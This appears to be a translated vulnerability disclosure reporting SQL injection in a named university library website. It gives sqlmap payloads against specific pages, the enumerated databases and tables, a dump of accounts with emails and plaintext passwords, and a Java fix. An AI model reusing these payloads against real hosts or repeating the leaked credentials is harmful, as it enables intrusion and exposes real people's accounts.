2015-03-30: Details reported to the vendor, awaiting vendor handling
2015-03-30: Vendor confirmed; details disclosed to the vendor only
2015-04-09: Details disclosed to core white hats and experts in the relevant field
2015-04-19: Details disclosed to regular white hats
2015-04-29: Details disclosed to intern white hats
2015-05-14: Details disclosed to the public
POST SQL injection
http://www.lib.xjtu.edu.cn/bookriview.do, POST parameters: action=page&sortType=*&goal=*&indexPage=1&bookname=*
Another location: http://www.lib.xjtu.edu.cn/news.do, POST parameters: action=page&sortType=*&goal=*&indexPage=1&title=*
sqlmap identified the following injection points with a total of 1236 HTTP(s) requests:
---
Parameter: bookname (POST)
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: action=page&subject=88952634&goal=88952634&indexPage=1&bookname=88952634' AND (SELECT 6480 FROM(SELECT COUNT(*),CONCAT(0x71626b7a71,(SELECT (CASE WHEN (6480=6480) THEN 1 ELSE 0 END)),0x7171717a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'hfBm'='hfBm
    Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

    Type: AND/OR time-based blind
    Title: MySQL < 5.0.12 AND time-based blind (heavy query)
    Payload: action=page&subject=88952634&goal=88952634&indexPage=1&bookname=88952634' AND 6748=BENCHMARK(5000000,MD5(0x5142424a)) AND 'lsfG'='lsfG
    Vector: AND [RANDNUM]=IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM])
---
web application technology: JSP
back-end DBMS: MySQL 5.0
available databases [12]:
[*] arc
[*] information_schema
[*] journal
[*] lib
[*] libcms
[*] mysql
[*] resourceGate
[*] resourceNav
[*] shanxicalis
[*] test
[*] xbnlcms
[*] xnold

Database: libcms
Table: user
[7 columns]
+------------+
| Column     |
+------------+
| DEPARTMENT |
| EMAIL      |
| ID         |
| NAME       |
| PASSWORD   |
| STATUS     |
| USERNAME   |
+------------+

Database: libcms
Table: user
[36 entries]
(USERNAME / PASSWORD hash dump omitted.) The author's annotation on the admin and admin123 rows: both use the weak password admin123.
The following table stores passwords in plaintext:
web application technology: JSP
back-end DBMS: MySQL 5.0
Database: xnold
Table: db_user
[3 entries]
+----+------+-------------------+---------+---------+----------+
| id | name | email             | account | role_fk | password |
+----+------+-------------------+---------+---------+----------+
| 1  | 韩进 | xjtu_java@163.com | admin   | 1       | admin    |
| 2  | �昊  | xjtu_uu@163.com   | test3   | 3       | 1        |
| 6  | 2    | 2                 | test2   | 2       | 2        |
+----+------+-------------------+---------+---------+----------+
Recommended fix: filter and validate the request parameters.
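As an added illustration of that fix (not code from the affected site), a Java data-access method for the bookriview.do search that binds bookname and goal as parameters and whitelists sortType; the class name, the book_review table and its columns (title, bookname, goal, created_at) are assumed.

```java
import java.sql.Connection;
import java.sql.PreparedStatement;
import java.sql.ResultSet;
import java.sql.SQLException;
import java.util.ArrayList;
import java.util.List;
import java.util.Map;

public class BookReviewDao {
    // Assumed schema: table book_review with columns title, bookname, goal, created_at.
    private static final int PAGE_SIZE = 20;
    // ORDER BY cannot take a bind parameter, so sortType is mapped through a
    // whitelist; anything not in the map is rejected instead of being spliced in.
    private static final Map<String, String> SORT_COLUMNS = Map.of(
            "title", "title",
            "date", "created_at");
    // Vulnerable pattern this replaces (string concatenation lets a quote in
    // bookname end the literal, which is what the error-based payload relies on):
    //   "... WHERE bookname LIKE '%" + bookname + "%' ORDER BY " + sortType
    public static List<String> findReviews(Connection conn, String bookname,
            String goal, String sortType, int indexPage) throws SQLException {
        String orderBy = SORT_COLUMNS.get(sortType);
        if (orderBy == null) {
            throw new IllegalArgumentException("unsupported sortType");
        }
        int page = Math.max(1, indexPage);          // clamp the paging input
        String sql = "SELECT title FROM book_review WHERE bookname LIKE ? ESCAPE '!' "
                + "AND goal = ? ORDER BY " + orderBy + " LIMIT ? OFFSET ?";
        List<String> titles = new ArrayList<>();
        try (PreparedStatement ps = conn.prepareStatement(sql)) {
            // Bound parameters keep quotes inside bookname as data, never as SQL.
            ps.setString(1, "%" + escapeLike(bookname) + "%");
            ps.setString(2, goal);
            ps.setInt(3, PAGE_SIZE);
            ps.setInt(4, (page - 1) * PAGE_SIZE);
            try (ResultSet rs = ps.executeQuery()) {
                while (rs.next()) {
                    titles.add(rs.getString("title"));
                }
            }
        }
        return titles;
    }

    // Binding stops SQL injection but not LIKE wildcard injection; escape % and _.
    static String escapeLike(String s) {
        return s.replace("!", "!!").replace("%", "!%").replace("_", "!_");
    }
}
```

The same treatment applies to the title parameter of news.do.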
Severity: Medium
Vulnerability Rank: 6
Confirmed: 2015-03-30 10:46
User notified, handling in progress
None yet